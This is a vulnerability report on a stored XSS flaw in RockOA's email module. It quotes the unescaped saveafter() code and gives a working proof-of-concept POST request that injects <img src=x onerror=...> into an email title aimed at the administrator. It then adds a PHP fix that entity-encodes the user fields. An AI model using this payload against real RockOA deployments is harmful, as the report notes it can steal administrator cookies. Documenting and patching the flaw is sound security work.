Official website: http://www.rockoa.com/
Demo link: http://demo.rockoa.com/
Vulnerable file: webmain/flow/input/mode_emailmAction.php
Lines: 34-63
protected function saveafter($table, $arr, $id, $addbo)
{
    $isturn = (int)$arr['isturn'];
    $type = (int)$arr['type'];
    if($isturn==1){
        if($type==0){
            $this->flow->savesubmid($arr['receid'], $id, 0,0);
            $this->flow->savesubmid($arr['ccid'], $id, 1,0);
        }
        $this->flow->savesubmid($arr['sendid'], $id, 2,1);
        // external (outgoing) email
        if($type == 1){
            $emsa = $this->getrecename($arr['receid']);
            if($emsa != ''){
                $ccsa = $this->getrecename($arr['ccid']);
                $fjar = m('file')->getfilepath('emailm', $id);
                m('email')->sendemailout($this->adminid, array(
                    'title' => $arr['title'],
                    'body' => $arr['content'],
                    'receemail' => $emsa[0],
                    'recename' => $emsa[1],
                    'ccemail' => $ccsa[0],
                    'ccname' => $ccsa[1],
                    'attachpath'=> $fjar[0],
                    'attachname'=> $fjar[1],
                ), 1); // send directly, not asynchronously
            }
        }
    }
}
The email send path performs no filtering or encoding of dangerous characters in the user-supplied fields (title and content are passed through unchanged), so a stored XSS payload reaches the recipient's inbox. This can be used to obtain the administrator's cookies.
Verification:
User: wangjing (an ordinary user) sends an email to the administrator with the following title:
<img src=x onerror=alert(/xss_test/)>
PoC:
POST /xinhu/index.php?a=save&m=mode_emailm|input&d=flow&ajaxbool=true&rnd=897989 HTTP/1.1
Host: 192.168.174.136:829
Content-Length: 193
Accept: */*
Origin: http://192.168.174.136:829
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.174.136:829/xinhu/?a=lu&m=input&d=flow&num=emailm&mid=0&callback=
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=gjqr8gpe7g4dlrqjjjmfvl2ja4; deviceid=1571022073329; xinhu_ca_rempass=0; xinhu_mo_adminid=ru0tvv0mn0yn0ur0mt0rv0tvt0mm0tvv0mm0yr08; xinhu_ca_adminuser=wangj
Connection: close
id=0&title=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss_test%2F)%3E&type=0&isturn=1&recename=%E7%AE%A1%E7%90%86%E5%91%98&receid=u1&ccname=&ccid=&content=xss_test&fileid=&sysmodeid=47&sysmodenum=emailm
After the administrator logs in and opens the email, the XSS is triggered.
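Added example (not RockOA's own code): the mail-payload construction from saveafter() with every user-controlled field entity-encoded before it is handed to sendemailout() and later rendered in the recipient's inbox, checked against the title payload from the report above. It assumes $emsa/$ccsa are [email, name] pairs as getrecename() returns them, $fjar is [path, name] from getfilepath(), and the inbox renders 'title' and 'body' as HTML; rockoa_escape(), rockoa_build_mail() and rockoa_is_inert() are helper names chosen here, not the framework's.

```php
<?php
// Added example, not RockOA's own code. Encodes the compose-form fields
// before they reach the mailer / inbox view so the report's payload is inert.

function rockoa_escape(string $s): string
{
    // Encode & < > " ' as entities so the value cannot break out of an HTML
    // text node or a quoted attribute; UTF-8 is set explicitly so multibyte
    // recipient names are neither mangled nor silently dropped.
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function rockoa_build_mail(array $arr, array $emsa, array $ccsa, array $fjar): array
{
    // Addresses and attachment paths are not rendered as HTML and stay as-is;
    // everything a user can type into the compose form is encoded. If the body
    // must keep rich formatting, replace rockoa_escape() on 'body' with an
    // allow-list HTML sanitizer rather than a blacklist of tags.
    return array(
        'title'      => rockoa_escape((string)$arr['title']),
        'body'       => rockoa_escape((string)$arr['content']),
        'receemail'  => $emsa[0],
        'recename'   => rockoa_escape((string)$emsa[1]),
        'ccemail'    => $ccsa[0],
        'ccname'     => rockoa_escape((string)$ccsa[1]),
        'attachpath' => $fjar[0],
        'attachname' => rockoa_escape((string)$fjar[1]),
    );
}

function rockoa_is_inert(string $s): bool
{
    // Sanity check: no raw tag delimiters survive the encoding step.
    return strpos($s, '<') === false && strpos($s, '>') === false;
}

// Constructed input: the title from the report and the same 'xss_test' body
// the PoC request sends; recipient data is made up for the demo.
$mail = rockoa_build_mail(
    array('title' => '<img src=x onerror=alert(/xss_test/)>', 'content' => 'xss_test'),
    array('admin@example.invalid', '管理员'),
    array('', ''),
    array('', '')
);
echo $mail['title'], "\n";
echo rockoa_is_inert($mail['title']) ? "title is inert\n" : "title still dangerous\n";
```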